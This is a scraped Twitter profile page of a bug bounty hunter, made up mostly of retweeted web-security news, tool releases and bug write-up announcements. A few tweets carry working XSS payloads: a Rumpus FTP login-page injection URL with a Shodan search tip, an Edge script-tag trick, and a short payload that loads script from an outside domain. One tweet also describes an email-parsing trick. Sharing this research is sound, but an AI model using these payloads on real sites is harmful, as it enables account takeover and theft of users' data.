Cosmin

@inhibitor181

Bug bounty hunter

Germany
Vrijeme pridruživanja: svibanj 2017.

Tweetovi

Blokirali ste korisnika/cu @inhibitor181

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @inhibitor181

  1. proslijedio/la je Tweet
    31. sij

    , , and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover.

    Poništi
  2. proslijedio/la je Tweet
    28. sij

    I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suite is web and mobile security, with lots of bug bounty experience. My resume and contact info are on , DMs open as well. RT's are much appreciated.

    Poništi
  3. proslijedio/la je Tweet
    27. sij

    Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? this could lead to interesting exploit scenarios with some email parsing libraries/code

    Poništi
  4. proslijedio/la je Tweet
    25. sij
    Poništi
  5. proslijedio/la je Tweet
    19. sij

    I have made a demo application to abuse Google Chrome cache by exploiting CORS. The code is big messy but it works. Original research was from Reviews are appreciated :-)

    Poništi
  6. proslijedio/la je Tweet
    10. sij

    Citrix ADC/Netscaler RCE (CVE-2019-19781) 😬

    Poništi
  7. proslijedio/la je Tweet
    7. sij
    Poništi
  8. proslijedio/la je Tweet
    7. sij

    Hi all, dropping another tool today. This one is very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s). Check it out:

    Poništi
  9. proslijedio/la je Tweet
    6. sij

    One of the scarier bugs I’ve found: with Microsoft’s go-ahead & after many hours spent, I’m excited to finally publish this writeup and PoC! 👩🏼‍💻

    Poništi
  10. proslijedio/la je Tweet
    5. sij

    Australia is on fire right now! What if we all donate 1 or 2 dollars? Maybe we can help save hundreds of animals in danger. To all my friends doing bug bounty, what’s one dollar? 1% of a low risk bug? if you can’t donate, plz RT! Thanks!!

    Poništi
  11. proslijedio/la je Tweet
    3. sij

    FINALLY releasing hakrawler! A web crawler for hackers! Check out the blog post for details.

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    31. pro 2019.

    Microsoft Edge (And Internet Explorer) is the only browser that allows running JavaScript from a <script> without the end tag <script async src=data:,alert(1)>

    Poništi
  13. 30. pro 2019.
    Poništi
  14. proslijedio/la je Tweet
    24. pro 2019.
    Poništi
  15. proslijedio/la je Tweet
    20. pro 2019.
    Poništi
  16. proslijedio/la je Tweet
    18. pro 2019.

    Rumpus FTP Web File Manager has an XSS at the login page. Just visit: http://example[.]com/Login?!'><svg/onload="XSS"> Anything after the character "!" will be inserted inside the HTML without encoding. Search on Shodan:

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    16. pro 2019.

    Finally got the approval, Here are multiple Linode's access token stealing/account takeover bugs, I like the second one. Retweet if you like it.

    Poništi
  18. proslijedio/la je Tweet

    Just posted From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 - to be followed up with a second writeup on bug I've found with these tools.

    Poništi
  19. proslijedio/la je Tweet
    13. pro 2019.

    The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting UI. Understand its impact + learn to safely patch your software in this post from : (With thanks to + )

    Poništi
  20. proslijedio/la je Tweet
    3. pro 2019.

    Exploiting XSS with 20 characters limitation Notice that ff characters is only one character but when browsers interpret it, it will be expanded as ff two characters. This open the door to buy larger domains, in a cheaper way. <script src=//℡㏛.pw>

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·